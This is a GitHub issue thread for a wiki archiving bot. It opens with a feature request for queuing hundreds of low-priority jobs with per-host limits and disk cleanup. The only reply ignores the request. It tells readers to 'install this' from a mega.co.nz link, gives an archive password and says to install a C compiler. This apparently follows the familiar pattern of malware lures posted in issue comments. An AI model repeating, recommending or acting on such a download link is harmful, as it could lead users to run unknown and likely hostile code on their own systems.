### ISSUE TITLE
large low-priority job processing

### ISSUE THREAD

**Issue by DigitalDwagon** [DigitalDwagon/WikiBot#33]
<+pabs> DigitalDragons: btw, feature request: I'd like to dump in 500-600 commands and have them done at low priority in the background - for eg only feed them in when there are say < 10 jobs running
<+pabs> DigitalDragons: that would also need the per-host and or per-IP limit feature, as well as automatic disk cleanup I guess, and maybe size checks if they aren't done yet?

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
